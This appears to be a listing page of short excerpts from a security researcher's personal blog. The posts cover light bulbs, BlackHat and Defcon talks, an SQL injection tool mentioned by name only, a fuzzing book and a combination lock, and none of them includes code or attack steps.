Fun
It begs the question…
I cant recall who said it in yesterdays meeting, but my response is simple: http://begthequestion.info/
MTBF and Light Bulbs..
Some of you will know that i finally moved out of the shoe box i lived in for 6 years and moved into a house (about 3 months ago) Since then i have replaced 3 different light bulbs at different places in the house.. Now this made me start thinking.. Surely when the house was new, they fitted in all the bulbs as brand new.. Now some sections of the house light a series of 4 or 6 bulbs at once.. yet there appears to be no link at all between “sibling” bulbs and their life-span..
Ok.. Now this is pretty cool…
For all those guys who usually scoff at CSI / Police Movies where the detective shouts “enhance image” or remove that person, you have to admit that life dos indeed imitate art..
(Click image or here)
Pretty neat…
2 Un-related thoughts.. on Echelon and the recent Skype Outage..
I suspect somewhere there exist cardinal rules of blogging which would state that using a single post to make 2 completely un-related posts is a no-no.. I will now promptly ignore it 2 push out 2 random thoughts that came up..
Echelon and Echelon spam..
While watching the Bourne Ultimatum the other night the usual “echelon“esque scene played out.. Guy on phone says keyword.. pan to NSA/CIA type building.. computer drone type person screams something like “we have a hot one”..
On hamsters, Escaping, Escaping of Hamsters and the Lack of escaping in Hamster…
OK.. So as i mentioned before, I saw Robert Graham from Erratasec demo hamster live on stage and wondered if hamster was doing useful input/output sanitization.. If it wasn’t, he was setting himself up for a pop-up that read “owned on stage” or worse a re-direct to tubgirl.. He didnt get owned on stage, which suggested that either the crowd was really well behaved or the tool was doing some tidying up so i decided to wait till i got home to check..
Late BlackHat Update..
ok.. so im in my room finally catching up on sleep (or will be in a few minutes) while most people are finishing Microsofts booze at the PURE microsoft party.. BlackHat is over, which means tomorrow we are off to the riviera for defcon..
Marco and i got a lot of positive feedback from our talk, including from guys like rob auger of wasc fame and andrew bortz who we quote in our paper, so it was pretty cool.. all our demos went of smoothly (where one of them was using javascript (and timing) to create a distributed brute-forcing tool, which had every opportunity to go south) so we were happy..
BlackHat Progress Report
(always wanted to say that!)
2 SensePost Training sessions are over, and as i type The weekday sessions are at about 50%. Feedback so far has been pretty cool and its been fun to meet new people / bump into some old friends..
The next “biggie” on the horizon is Wednesdays talk.. We have had a fair bit of interest so far and even though the slot has some stiff competition its seems like all will be well :). The talk should be interesting to developers, pen-testers and even just people with a vague interest in see’ing cool stuff.. Marco has been adding functionality to “squeeza” like a demon and as it stands its probably the only SQL Injection tool i know that will allow (file downloads, arb sql queries, database mining) all purely in T-Sql over a variety of transport channels (dns, error messages, timing). We will post the link to it for download just before we talk..
-sigh- little things, little minds…
Deels stumbled on www.simpsonizeme.com to give me mh, the springfield edition..
Combine with your intranet mug-shots, and it could give you hours of lost productivity..
Probably the best book dedication i have ever seen….
Richard Bejtlich didnt give the pre-release a glowing review but i know at least a few people waiting eagerly to get their hands on the new “Fuzzing: Brute Force Vulnerability Discovery by Michael Sutton, Adam Greene, and Pedram Amini“. Pedram is the mastermind behind Pai-Mei and started OpenRCE, but his last blog post points to the books dedication page, and it probably makes the book worth buying all on its own..
outstanding…
Adventures while moving… (Part II)
Ok.. so we have an outside gate type thing that leads to our garden. Since we would probably get to the gate at random points of the day / week we figured a combination lock would make sense. Now i know that combination locks traditionally have a pretty small keyspace, and have a horrible reputation so i asked Deels to make sure she got one with at least 4 digits, and had a good name behind it..